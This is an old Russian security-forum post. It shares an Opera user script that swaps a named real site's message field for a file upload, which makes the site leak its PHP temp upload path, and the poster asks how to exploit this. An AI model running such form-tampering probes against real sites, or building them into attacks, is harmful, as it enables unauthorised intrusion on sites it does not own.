Флудер на JavaScript

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#14

15.05.2007, 20:09

~~invlose~~

Banned

Регистрация: 06.05.2007

Сообщений: 87

Провел на форуме:
1420517

Репутация: 230

в коде страницы случайно нашел

<form ..... enctype="multipart/form-data">

Теперь берем Opera и в папку которая прописана в свойствах для javascript(туда можно кидать свои скрипты userJs)

создаем файл wow.js c таким содержимым

PHP код:


		
			
// ==UserScript==  

// @exclude *  

// @include http://emo.nnov.ru/?id*

// ==/UserScript==  

document.addEventListener("DOMContentLoaded", Q, false);

 function Q(){ 

var f = document.getElementById('postform');

var t = f.text;

t.parentNode.removeChild(t);

var file = document.createElement('input'); 

file.type = 'file';

file.name = 'text';  f.appendChild(file);  

}

в итоге пробуем залить файл
и вместо сообщения получаем название временной папки /tmp/phpgRIUBz

Вопрос это как-то можно использовать????

внимание:
чтобы отправлять сообщения на том сайте нужно зарегиться

*******************************

Последний раз редактировалось iNVLose; 15.05.2007 в 20:24..